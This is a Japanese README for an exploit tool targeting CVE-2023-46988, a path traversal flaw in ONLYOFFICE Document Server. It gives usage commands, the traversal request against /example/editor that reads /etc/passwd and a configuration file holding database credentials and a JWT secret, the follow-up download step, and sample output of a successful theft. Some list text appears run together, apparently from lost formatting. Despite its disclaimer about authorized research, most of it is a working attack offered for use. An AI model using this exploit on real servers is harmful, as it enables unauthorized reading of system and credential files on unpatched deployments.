
CVE-2023-46988: ONLYOFFICE パストラバーサルエクスプロイト
このスクリプトは、ONLYOFFICE Document Server におけるパストラバーサル脆弱性 (CVE-2023-46988) を悪用し、権限のないユーザーがサーバーから任意のファイルをコピーできるようにします。この脆弱性は /example/editor エンドポイントに存在し、fileExt パラメータを操作することで、機密性の高いシステムファイルや設定ファイルにアクセスできます。
このツールは教育および許可されたセキュリティ研究目的のみに使用されます。
明示的な許可なくシステムに対して不正に使用することは違法であり、非倫理的です。
/etc/passwd/etc/onlyoffice/documentserver/local.json(データベース認証情報とJWTシークレットを含む)--file 引数でを指定して取得。--proxy)。--verify)。python onlyoffice_exploit.py http://localhost
これにより以下が取得されます:
/etc/passwd/etc/onlyoffice/documentserver/local.json/etc/hosts)python onlyoffice_exploit.py http://localhost --file /etc/hosts
127.0.0.1:8080)python onlyoffice_exploit.py http://localhost --proxy
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
python onlyoffice_exploit.py https://example.local --verify
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
fileExt パラメータを使用して /example/editor にリクエストを送信:
GET /example/editor?fileExt=../../../../../../../../etc/passwd
/example/download?fileName=<抽出されたファイル名> からファイルをダウンロード。[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd
ONLYOFFICEは2024年2月のアップデートでこの脆弱性を修正しました。
ユーザーはサーバーを保護するために最新バージョンに更新する必要があります。
このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。